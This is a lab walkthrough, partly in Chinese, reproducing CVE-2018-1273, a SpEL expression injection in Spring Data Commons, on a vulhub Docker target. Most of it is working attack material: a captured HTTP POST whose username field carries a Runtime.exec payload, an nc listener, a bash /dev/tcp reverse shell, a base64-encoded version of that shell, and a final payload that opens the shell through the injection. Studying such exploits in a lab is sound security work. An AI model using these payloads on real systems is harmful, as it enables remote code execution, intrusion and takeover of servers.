SpringDataCommons remote command execution vulnerability_CVE-2018-1273 (Desequence Runtime method)
[poc]
1 Interpretation of online vulnerabilities:
https://vulhub.org/#/environments/spring/CVE-2018-1273/
Spring Data Commons 在2.0.5及以前版本中,存在SpEL表达式注入漏洞
2 Environment setup
cd /home/kali/vulhub/spring/CVE-2018-1273
2.1 Startup:
sudo docker-compose up -d
sudo docker-compose ps -a
sudo docker ps -a
2.2 Started: access port 8098
3 affected versions:
Spring Data Commons <= version 2.0.5
4 Vulnerability recurrence
4 Vulnerability recurrence
4.1 Access page
Visit pagehttp://192.168.225.166:8098/users
4.2 bp packet capture, modify parameters
4.2.1 The Payload in the link is captured and forwarded to the repeater during registration, and modified into the following data packet:
POST /users?page=&size=5 HTTP/1.1
Host: 192.168.225.166:8098
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
Origin: http://192.168.225.166:8098
Connection: close
Referer: http://192.168.225.166:8098/users
Upgrade-Insecure-Requests: 1
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
4.2.2 Core instructions, send, class deserialization
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
4.2.3 Check the docker container to see that the file has been created and there is a vulnerability
sudo docker ps -a
sudo docker exec -it d63fc660cd63 /bin/bash
5 exploits
5.1 Build a rebound shell
nc -lvp 6666 # l是监听模式;v是显示详细信息;p是指定端口;
bash -i &> /dev/tcp/192.168.225.166/6666 0<&1 # 反弹交互指令tcp服务
=============解释==================
bash -c {echo,base64编码一句话shell}|{base64,-d}|{bash,-i}
==============最终组合=================
# https://ares-x.com/tools/runtime-exec/转换
bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPCYx}|{base64,-d}|{bash,-i}
5.2 Core POC utilization
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPCYx}|{base64,-d}|{bash,-i}")]=&password=&repeatedPassword=